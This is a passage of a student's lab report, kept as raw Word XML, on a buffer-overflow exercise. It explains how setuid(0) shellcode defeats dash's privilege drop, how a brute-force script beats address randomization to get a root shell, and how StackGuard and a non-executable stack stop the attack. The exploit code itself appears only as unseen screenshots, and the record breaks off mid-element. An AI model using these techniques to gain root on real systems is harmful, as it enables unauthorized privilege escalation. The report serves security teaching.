    <w:p w14:paraId="7A140CC3" w14:textId="77777777" w:rsidR="009322F2" w:rsidRDefault="009322F2" w:rsidP="009322F2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5857DA09" w14:textId="77777777" w:rsidR="009322F2" w:rsidRDefault="009322F2" w:rsidP="009322F2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B21E48C" w14:textId="77777777" w:rsidR="009322F2" w:rsidRDefault="009322F2" w:rsidP="009322F2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D748EC5" w14:textId="77777777" w:rsidR="009322F2" w:rsidRDefault="009322F2" w:rsidP="009322F2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04617808" w14:textId="77777777" w:rsidR="009322F2" w:rsidRDefault="009322F2" w:rsidP="009322F2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F681061" w14:textId="77777777" w:rsidR="009322F2" w:rsidRDefault="009322F2" w:rsidP="009322F2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D10792" w14:textId="77777777" w:rsidR="009322F2" w:rsidRDefault="009322F2" w:rsidP="00363400"/>
    <w:p w14:paraId="5551D10D" w14:textId="44EC53FA" w:rsidR="00F34F6B" w:rsidRDefault="00F34F6B" w:rsidP="00B47C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3: Defeating dash’s Countermeasure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DC0C26" w14:textId="2BB64F4F" w:rsidR="00F34F6B" w:rsidRPr="00825E16" w:rsidRDefault="00D064F1" w:rsidP="00B47C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825E16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788558BE" w14:textId="68B51DB4" w:rsidR="00D064F1" w:rsidRDefault="00D9131D" w:rsidP="00B47C59">
      <w:r w:rsidRPr="00D9131D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0741708A" wp14:editId="09F054F1">
            <wp:extent cx="5943600" cy="680720"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="71674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48792" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="680720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="178D3319" w14:textId="77777777" w:rsidR="00825E16" w:rsidRPr="00825E16" w:rsidRDefault="00825E16" w:rsidP="00B47C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825E16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00825E16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00825E16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(0) Commented Out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28787061" w14:textId="1D711DB4" w:rsidR="00B22849" w:rsidRDefault="005F49CC" w:rsidP="00B47C59">
      <w:r w:rsidRPr="005F49CC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23E73A0B" wp14:editId="1FEF74C8">
            <wp:extent cx="5943600" cy="1204595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8942910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91037" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1204595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A1CCC" w14:textId="070FE458" w:rsidR="005F49CC" w:rsidRDefault="00A53515" w:rsidP="00B47C59">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0) is commented out, and the binary is set-UID root, dash will notice the UID mismatch and drop privileges. Thus, you get a shell, but it won’t have root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AED703A" w14:textId="23E0C57B" w:rsidR="00825E16" w:rsidRPr="00825E16" w:rsidRDefault="00825E16" w:rsidP="00B47C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825E16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00825E16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00825E16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(0) Uncommented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61B4F8" w14:textId="07DCDB14" w:rsidR="00A53515" w:rsidRDefault="009559E0" w:rsidP="00B47C59">
      <w:r w:rsidRPr="009559E0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ECD48DC" wp14:editId="57CA58DE">
            <wp:extent cx="5943600" cy="1306830"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="11393653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65354" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1306830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB22279" w14:textId="08FC7767" w:rsidR="009559E0" w:rsidRDefault="009559E0" w:rsidP="00B47C59">
      <w:r>
        <w:t>We get a shell with root privileges because the program sets both the real and the effective UIDs to root before invoking the shell, making dash not drop its privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146BB6DD" w14:textId="1A376591" w:rsidR="00E76DFF" w:rsidRDefault="00B22849" w:rsidP="00B47C59">
      <w:r>
        <w:t xml:space="preserve">When the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(0) line is commented out, it will run with the effective and real UIDs of the user that runs it. But when the program is compiled as a set-UID binary owned by root, </w:t>
      </w:r>
      <w:r w:rsidR="002A497D">
        <w:t xml:space="preserve">and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A497D">
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A497D">
        <w:t xml:space="preserve">(0) line is still commented out, it will run with the effective UID as root but the real UID as the original user. </w:t>
      </w:r>
      <w:r w:rsidR="00BA3F87">
        <w:t xml:space="preserve">This is when dash’s countermeasure kicks in and it will drop the privileges. If you uncomment the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA3F87">
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA3F87">
        <w:t>(0) line and run it (as seen below) it will set both the effective and real UIDs to root before running the shell, thereby bypassing the dash’s countermeasure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2593C0" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="32BE16C6" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="60E08DD9" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="45D1A70E" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="5C7F671A" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="72A18BAB" w14:textId="12732CB9" w:rsidR="00BA3F87" w:rsidRDefault="0056342A" w:rsidP="00B47C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Running the previous attack with the added assembly code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506617A4" w14:textId="0E3DFBF2" w:rsidR="0056342A" w:rsidRDefault="001E62FA" w:rsidP="00B47C59">
      <w:r w:rsidRPr="001E62FA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AF72A48" wp14:editId="0848552F">
            <wp:extent cx="5943600" cy="1416685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3094192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1929" name="Picture 1" descr="A computer screen shot of a program code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1416685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE00EFC" w14:textId="58ED3F9D" w:rsidR="001E62FA" w:rsidRDefault="001E62FA" w:rsidP="00B47C59">
      <w:r>
        <w:t xml:space="preserve">The shellcode is seen to bypass the dash security measure and root access is given. </w:t>
      </w:r>
      <w:r w:rsidR="00453D5E">
        <w:t xml:space="preserve">The shellcode that we added to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00453D5E">
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00453D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00633AAD">
        <w:t xml:space="preserve">first calls the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00633AAD">
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00633AAD">
        <w:t xml:space="preserve">(0) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00633AAD">
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00633AAD">
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00633AAD">
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00633AAD">
        <w:t xml:space="preserve"> sets the effective and real UIDs of the running process to 0, which is the UID for the root user. This ensures that by the time </w:t>
      </w:r>
      <w:r w:rsidR="00E44E86">
        <w:t>the shellcode tries to execute the /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E44E86">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E44E86">
        <w:t xml:space="preserve"> command, both UIDs are already set to root. With both of the UIDs set to root, when dash does its check, it finds no difference between the two and will not drop privileges. </w:t>
      </w:r>
      <w:r w:rsidR="00086074">
        <w:t xml:space="preserve">After the checks, the shellcode calls </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00086074">
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00086074">
        <w:t xml:space="preserve">() to execute the shell. Since no privileges were dropped, this shell runs with root access. </w:t>
      </w:r>
      <w:r w:rsidR="003E3004">
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="00086074">
        <w:t xml:space="preserve"> by this addition, the </w:t>
      </w:r>
      <w:r w:rsidR="00116A5A">
        <w:t xml:space="preserve">shellcode effectively neutralized the privilege-dropping mechanism of dash and when the attack was </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00116A5A">
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00116A5A">
        <w:t xml:space="preserve"> we were granted a shell with root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED90096" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="7C24B58E" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="277CE316" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BFF8C29" w14:textId="58C6EAC0" w:rsidR="00116A5A" w:rsidRDefault="00116A5A" w:rsidP="00B47C59">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task 4: </w:t>
      </w:r>
      <w:r w:rsidR="000E778C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defeating Address Randomization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F029B5E" w14:textId="7B1FDE03" w:rsidR="000E778C" w:rsidRDefault="004A55D1" w:rsidP="00B47C59">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4425F657" w14:textId="7BCA75CD" w:rsidR="004A55D1" w:rsidRDefault="0029083A" w:rsidP="00B47C59">
      <w:r w:rsidRPr="0029083A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21162539" wp14:editId="4DE0F49B">
            <wp:extent cx="5943600" cy="676910"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="120583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37413" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="676910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC25E0A" w14:textId="13DB8FB0" w:rsidR="0029083A" w:rsidRDefault="0029083A" w:rsidP="00B47C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Same attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A412DD" w14:textId="5F9171C8" w:rsidR="0029083A" w:rsidRDefault="00167078" w:rsidP="00B47C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00167078">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C6EE67" wp14:editId="0FB4E313">
            <wp:extent cx="4686954" cy="1305107"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13085234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23430" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4686954" cy="1305107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB4A8E0" w14:textId="1054E706" w:rsidR="00AC5215" w:rsidRPr="003E3004" w:rsidRDefault="00A45493" w:rsidP="00B47C59">
      <w:r>
        <w:t>This attack now fails from Task 2. The memory addresses are now randomized, so the hard-coded addresses that were used in Task 2 are no longer valid. The exploit fails because the expected memory layout has changed due to ASLR. The exact address of the buffer (or any other memory segment) in the vulnerable program (stack) is now different every time the program runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA78F2E" w14:textId="3935601A" w:rsidR="00A45493" w:rsidRDefault="00A45493" w:rsidP="00B47C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Brute Force:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D62E7" w14:textId="4372AE42" w:rsidR="00A45493" w:rsidRDefault="00EF063C" w:rsidP="00B47C59">
      <w:r>
        <w:t>bruteforce.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A9B754" w14:textId="14A90FFA" w:rsidR="00EF063C" w:rsidRDefault="00EF063C" w:rsidP="00B47C59">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x bruteforce.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2751EA4F" w14:textId="104ED634" w:rsidR="00EF063C" w:rsidRDefault="00EF063C" w:rsidP="00B47C59">
      <w:r>
        <w:t>./bruteforce.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28753033" w14:textId="36F05EE0" w:rsidR="00EF063C" w:rsidRDefault="00AC5215" w:rsidP="00B47C59">
      <w:r w:rsidRPr="00AC5215">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E748D78" wp14:editId="3B87C505">
            <wp:extent cx="5238750" cy="3135974"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="12517514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51466" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5301098" cy="3173296"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEBC9A0" w14:textId="5E0FB85D" w:rsidR="00A0248C" w:rsidRDefault="00AC5215" w:rsidP="00B47C59">
      <w:r>
        <w:t>When the bruteforce.sh script was run, it took 1 minute and 39 second</w:t>
      </w:r>
      <w:r w:rsidR="00367699">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before </w:t>
      </w:r>
      <w:r w:rsidR="009D2399">
        <w:t xml:space="preserve">the randomized </w:t>
      </w:r>
      <w:r w:rsidR="00A06425">
        <w:t xml:space="preserve">address matched and the exploit was successful. As seen </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A06425">
        <w:t>above</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A06425">
        <w:t xml:space="preserve"> root access in the shell is achieved by the brute force attack – and this attack was relatively </w:t>
      </w:r>
      <w:r w:rsidR="00367699">
        <w:t>quick, but it may not always be this fast</w:t>
      </w:r>
      <w:r w:rsidR="00D162D8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2485F4" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="619E8911" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="21597F44" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="5B1083B6" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="5A99B750" w14:textId="77777777" w:rsidR="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="4B34F78C" w14:textId="77777777" w:rsidR="00E14792" w:rsidRPr="00E14792" w:rsidRDefault="00E14792" w:rsidP="00B47C59"/>
    <w:p w14:paraId="03307AD4" w14:textId="022566F7" w:rsidR="00D162D8" w:rsidRDefault="00D162D8" w:rsidP="00B47C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task 5: Turn on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>StackGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC5856" w14:textId="06D34833" w:rsidR="00D162D8" w:rsidRDefault="001F6425" w:rsidP="00B47C59">
      <w:r>
        <w:t>Turn off randomization first:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C9CB08" w14:textId="46D096FF" w:rsidR="00505EB3" w:rsidRDefault="00237A29" w:rsidP="00B47C59">
      <w:r w:rsidRPr="00237A29">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F433674" wp14:editId="1270E553">
            <wp:extent cx="5943600" cy="648335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="168174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48395" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="648335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC5EB7" w14:textId="5EF599F7" w:rsidR="00203D9F" w:rsidRDefault="00203D9F" w:rsidP="00B47C59">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attack attempt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D95FC" w14:textId="58B3A6D8" w:rsidR="00203D9F" w:rsidRDefault="00A0248C" w:rsidP="00B47C59">
      <w:r w:rsidRPr="00A0248C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F14A420" wp14:editId="498E9334">
            <wp:extent cx="5943600" cy="1414145"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12819449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44931" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1414145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13282E2E" w14:textId="6A20B625" w:rsidR="00C868BD" w:rsidRDefault="00C868BD" w:rsidP="00B47C59">
      <w:r>
        <w:t xml:space="preserve">There is no shell success, instead there is an error message as seen above. This message indicates that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>StackGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> detected a buffer overflow attempt (due to the canary value being altered) and terminated the program safely. </w:t>
      </w:r>
      <w:r w:rsidR="002F0BD9">
        <w:t>The canary value is a random value that is placed between the buffer and control data, which, if overwritten</w:t>
      </w:r>
      <w:r w:rsidR="00BA47FD">
        <w:t xml:space="preserve">, signals an overflow. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>StackGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mechanism detected the attempt to overwrite the return address and prevented the execution of the malicious payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7137428D" w14:textId="77777777" w:rsidR="00316B43" w:rsidRDefault="00316B43" w:rsidP="00B47C59"/>
    <w:p w14:paraId="66DC1EE9" w14:textId="7F85674F" w:rsidR="00C95760" w:rsidRDefault="00C95760" w:rsidP="00B47C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 6: Turn on the Non-executable Stack Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1882CF83" w14:textId="32756C49" w:rsidR="00C95760" w:rsidRDefault="00602977" w:rsidP="00B47C59">
      <w:r>
        <w:t>Randomization is still turned off from the previous task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2D2EA7" w14:textId="66BCE8B4" w:rsidR="00602977" w:rsidRDefault="00F57EDC" w:rsidP="00B47C59">
      <w:r>
        <w:t>Running the attack with the non-executable stack option:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE8E506" w14:textId="29DDE8DD" w:rsidR="00F57EDC" w:rsidRDefault="004056D0" w:rsidP="00B47C59">
      <w:r w:rsidRPr="004056D0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="413B339D" wp14:editId="79940A33">
